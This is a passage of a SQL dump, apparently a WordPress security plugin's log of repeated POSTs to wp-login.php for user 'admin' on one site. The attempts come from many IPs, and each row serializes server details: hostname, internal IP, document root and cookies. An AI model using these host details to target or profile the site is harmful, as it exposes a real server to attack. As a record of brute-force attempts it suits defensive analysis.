Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51192\";s:11:\"REMOTE_ADDR\";s:13:\"185.179.24.14\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744776980.4628489;s:12:\"REQUEST_TIME\";i:1744776980;}}','185.179.24.14',0,'2025-04-16 09:46:22','1970-01-01 00:00:00'),(93719,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/Mi5GLAnCAy7BAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50144\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.120.17\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744777774.9049721;s:12:\"REQUEST_TIME\";i:1744777774;}}','198.54.120.17',0,'2025-04-16 09:59:36','1970-01-01 00:00:00'),(93720,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/NTtGLAnCAy/xAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43740\";s:11:\"REMOTE_ADDR\";s:14:\"103.221.222.85\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744778555.283356;s:12:\"REQUEST_TIME\";i:1744778555;}}','103.221.222.85',0,'2025-04-16 10:12:37','1970-01-01 00:00:00'),(93721,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/OFFGLAnCAzETAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52596\";s:11:\"REMOTE_ADDR\";s:13:\"160.25.166.79\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744779345.249054;s:12:\"REQUEST_TIME\";i:1744779345;}}','160.25.166.79',0,'2025-04-16 10:25:47','1970-01-01 00:00:00'),(93722,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/O0xGLAnCAzMIAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50682\";s:11:\"REMOTE_ADDR\";s:14:\"167.86.120.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744780108.6921589;s:12:\"REQUEST_TIME\";i:1744780108;}}','167.86.120.248',0,'2025-04-16 10:38:30','1970-01-01 00:00:00'),(93723,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/PlVMbgnDA9YSAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"14410\";s:11:\"REMOTE_ADDR\";s:13:\"91.206.201.66\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744780885.9796779;s:12:\"REQUEST_TIME\";i:1744780885;}}','91.206.201.66',0,'2025-04-16 10:51:27','1970-01-01 00:00:00'),(93724,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/QV9GLAnCAzhfAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"11934\";s:11:\"REMOTE_ADDR\";s:12:\"91.151.95.70\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744781663.4345629;s:12:\"REQUEST_TIME\";i:1744781663;}}','91.151.95.70',0,'2025-04-16 11:04:25','1970-01-01 00:00:00'),(93725,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/RHNGLAnCAzoVAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36648\";s:11:\"REMOTE_ADDR\";s:13:\"185.103.39.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744782451.9101679;s:12:\"REQUEST_TIME\";i:1744782451;}}','185.103.39.36',0,'2025-04-16 11:17:33','1970-01-01 00:00:00'),(93726,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/R4dGLAnCAztkAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37742\";s:11:\"REMOTE_ADDR\";s:14:\"89.144.145.213\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744783240.581773;s:12:\"REQUEST_TIME\";i:1744783240;}}','89.144.145.213',0,'2025-04-16 11:30:42','1970-01-01 00:00:00'),(93727,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/SpZGLAnCAzy5Ag==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38250\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.232.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744784023.572165;s:12:\"REQUEST_TIME\";i:1744784023;}}','162.0.232.248',0,'2025-04-16 11:43:45','1970-01-01 00:00:00'),(93728,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/TaxGLAnCAz5DAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41084\";s:11:\"REMOTE_ADDR\";s:13:\"178.32.112.62\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744784813.192323;s:12:\"REQUEST_TIME\";i:1744784813;}}','178.32.112.62',0,'2025-04-16 11:56:55','1970-01-01 